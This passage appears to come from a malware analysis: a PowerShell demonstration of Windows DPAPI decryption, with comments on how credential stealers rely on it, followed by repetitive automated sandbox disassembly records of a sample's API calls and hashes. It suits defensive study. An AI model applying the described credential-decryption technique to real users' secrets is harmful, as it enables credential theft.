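            $Blob, $Entropy, [Security.Cryptography.DataProtectionScope]::CurrentUser)
        [Text.Encoding]::UTF8.GetString($out)
    } catch [Security.Cryptography.CryptographicException] {
        # Wrong user context, wrong entropy, or a blob bound to another
        # machine's master key. A stealer avoids this outcome by running
        # inside the victim's own session, as the sample does.
        $null
    }
}

# Constructed demonstration value (not from the sample).
$blob = Protect-Secret -PlainText 'demo-credential'

# Same user, no entropy: decrypts silently, which is the situation the
# listing's all-zero optional arguments describe.
Unprotect-Secret -Blob $blob

# With optional entropy the identical call without it fails, so an
# application-supplied entropy value is the one DPAPI input such code lacks.
$entropy = [byte[]](1..16)
$blob2 = Protect-Secret -PlainText 'demo-credential' -Entropy $entropy
Unprotect-Secret -Blob $blob2                     # $null: entropy missing
Unprotect-Secret -Blob $blob2 -Entropy $entropy   # decrypts
```

                               Run it as an ordinary user; the first Unprotect-Secret call succeeds without any secret being supplied, which is the property a credential stealer running in the victim's session relies on.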
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: _xw^$rB]o
                              • API String ID: 0-2137878691
                              • Opcode ID: e404783061543ed38dc5228f56f302c4f688f78af4ed9557df4c7c4b8829fc86
                              • Instruction ID: 59c48c9846ddededc0a7a00bef18ec85b02386715d7d2c52ffb4401c4e74fe3f
                              • Opcode Fuzzy Hash: e404783061543ed38dc5228f56f302c4f688f78af4ed9557df4c7c4b8829fc86
                              • Instruction Fuzzy Hash: B04115B39183189BE354BE38DC8876AF7E5EF54310F174A3C9AC593740E97919118687
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: {:qK
                              • API String ID: 0-1672235112
                              • Opcode ID: 0fa08a3bf7a88135eaa9921601958297eae1aceafed4a3822c4cdd767a755e4b
                              • Instruction ID: 502db3a4e5ea11f3b074265e59e5163d46593030f7a6e0e9f3c8f333260d0db9
                              • Opcode Fuzzy Hash: 0fa08a3bf7a88135eaa9921601958297eae1aceafed4a3822c4cdd767a755e4b
                              • Instruction Fuzzy Hash: 253226F3A0C2149FE304AE2DDC8567AFBE5EF84720F1A4A3DEAC587744E63558058687
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 2v__
                              • API String ID: 0-3991795242
                              • Opcode ID: 7dd90d984f5237e7c90ac2cc066cc3cbbcd605dabe649a79c60c781039911406
                              • Instruction ID: 3ded12e9c3c1fe4b8c3262a389974041dda2d28696a79ce934d4979db2dc9468
                              • Opcode Fuzzy Hash: 7dd90d984f5237e7c90ac2cc066cc3cbbcd605dabe649a79c60c781039911406
                              • Instruction Fuzzy Hash: B9512CF3D182145FF300692CEC457AABBD9EF94720F1A053DEAD8D3780E9799D058296
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: D]t{
                              • API String ID: 0-3721574867
                              • Opcode ID: 1773bc63bd121b8b5efb146401d724a0f2b2e7d83145d74ea7c0857910b25d1f
                              • Instruction ID: 20287a49c903cb4c2a40812bd17cc5c3048865ab432ec216e5369fc6cea2e9c7
                              • Opcode Fuzzy Hash: 1773bc63bd121b8b5efb146401d724a0f2b2e7d83145d74ea7c0857910b25d1f
                              • Instruction Fuzzy Hash: C35128F360C6085FE344AE3DEC85776BBD9DBD4724F19823DE688C2B44F87999014255
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: }}
                              • API String ID: 0-3649945341
                              • Opcode ID: 72fc11f91228ba3eb8a03a321ca5fc65c4e8bb7e42e299bd090525bb5d838a82
                              • Instruction ID: 9018912085d770658c2b6c935023b366d968204c3ed8fc37e181ae4617fa4347
                              • Opcode Fuzzy Hash: 72fc11f91228ba3eb8a03a321ca5fc65c4e8bb7e42e299bd090525bb5d838a82
                              • Instruction Fuzzy Hash: 145148F3A081045BE7089E2DDC14B3AB7D6EFD8320F1A493DEAC9D7784E9355C158686
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: z9tI
                              • API String ID: 0-1244595261
                              • Opcode ID: 7b8c1af4c2f5120645a3386ad2f6f05179947933fb408d8267c378d2aa847e47
                              • Instruction ID: c0bcc1a78a36e112b5fbedb2dd3373ef39880d425e6e81e8de4da3726f2a0163
                              • Opcode Fuzzy Hash: 7b8c1af4c2f5120645a3386ad2f6f05179947933fb408d8267c378d2aa847e47
                              • Instruction Fuzzy Hash: FC5126F3B183009BF3049D79EDC57A77696EBC4720F2A863DDB8493B88D97C48064285
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8a2e6d674605c7045e0b239b02532674c6b601f279007074aab0d23c07e454dd
                              • Instruction ID: bf92abd064a4d32f609fee13c71d85835b75dc0b671e0f3891a5bb5448f8da76
                              • Opcode Fuzzy Hash: 8a2e6d674605c7045e0b239b02532674c6b601f279007074aab0d23c07e454dd
                              • Instruction Fuzzy Hash: AA6128F3A0C2045FF3086E2DEC8577ABBE9EB84720F16463DEAC5C7344E97558058696
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f9d1ff5638686cc1da2423075cfb6e29b792bc79c159e283e9d00af1600c8a64
                              • Instruction ID: 9ecfe5d534dc02f5272ccab2a330aa0c7efd1172031425726b2ffe5f0b6f23bf
                              • Opcode Fuzzy Hash: f9d1ff5638686cc1da2423075cfb6e29b792bc79c159e283e9d00af1600c8a64
                              • Instruction Fuzzy Hash: 6E41FBF3A086148BE304AF29DC4473AF7D6EBD0720F1A853DD9C897784D97858468782
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 14844281e63870e332eb11bdb43d11cdcc21e7d3b1f323403aaaed509eb809fe
                              • Instruction ID: 5fff2faad9cd96928d48cec510cec1e4d604cf5884a875e9c530bd39d4a47789
                              • Opcode Fuzzy Hash: 14844281e63870e332eb11bdb43d11cdcc21e7d3b1f323403aaaed509eb809fe
                              • Instruction Fuzzy Hash: 6321C7F26082089FE705BE2ADC8276EB7E6EFD4221F1A853CDBC443314EA3165158697
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 00E48636
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4866D
                              • lstrcpy.KERNEL32(?,00000000), ref: 00E486AA
                              • StrStrA.SHLWAPI(?,00D2F308), ref: 00E486CF
                              • lstrcpyn.KERNEL32(010693D0,?,00000000), ref: 00E486EE
                              • lstrlen.KERNEL32(?), ref: 00E48701
                              • wsprintfA.USER32 ref: 00E48711
                              • lstrcpy.KERNEL32(?,?), ref: 00E48727
                              • StrStrA.SHLWAPI(?,00D2F2D8), ref: 00E48754
                              • lstrcpy.KERNEL32(?,010693D0), ref: 00E487B4
                              • StrStrA.SHLWAPI(?,00D2F3C8), ref: 00E487E1
                              • lstrcpyn.KERNEL32(010693D0,?,00000000), ref: 00E48800
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                              • String ID: %s%s
                              • API String ID: 2672039231-3252725368
                              • Opcode ID: d11755d124eea26586b95bc75f1afba877296f85553b5b6e36cb9924a371c190
                              • Instruction ID: 09980da76fefdfef0756f72cc5bd87bb183765173bfad781dc79e9a5166deb4e
                              • Opcode Fuzzy Hash: d11755d124eea26586b95bc75f1afba877296f85553b5b6e36cb9924a371c190
                              • Instruction Fuzzy Hash: 16F16E71900218EFDB20DB64DD4CADEB7B9EF48304F109559FA89E7254DB35AE05CBA0
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E31F9F
                              • lstrlen.KERNEL32(00D28C08), ref: 00E31FAE
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31FDB
                              • lstrcat.KERNEL32(00000000,?), ref: 00E31FE3
                              • lstrlen.KERNEL32(00E61794), ref: 00E31FEE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3200E
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3201A
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E32042
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3204D
                              • lstrlen.KERNEL32(00E61794), ref: 00E32058
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E32075
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E32081
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E320AC
                              • lstrlen.KERNEL32(?), ref: 00E320E4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E32104
                              • lstrcat.KERNEL32(00000000,?), ref: 00E32112
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E32139
                              • lstrlen.KERNEL32(00E61794), ref: 00E3214B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3216B
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E32177
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3219D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E321A8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E321D4
                              • lstrlen.KERNEL32(?), ref: 00E321EA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3220A
                              • lstrcat.KERNEL32(00000000,?), ref: 00E32218
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E32242
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3227F
                              • lstrlen.KERNEL32(00D2DF58), ref: 00E3228D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E322B1
                              • lstrcat.KERNEL32(00000000,00D2DF58), ref: 00E322B9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E322F7
                              • lstrcat.KERNEL32(00000000), ref: 00E32304
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3232D
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E32356
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E32382
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E323BF
                              • DeleteFileA.KERNEL32(00000000), ref: 00E323F7
                              • FindNextFileA.KERNEL32(00000000,?), ref: 00E32444
                              • FindClose.KERNEL32(00000000), ref: 00E32453
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
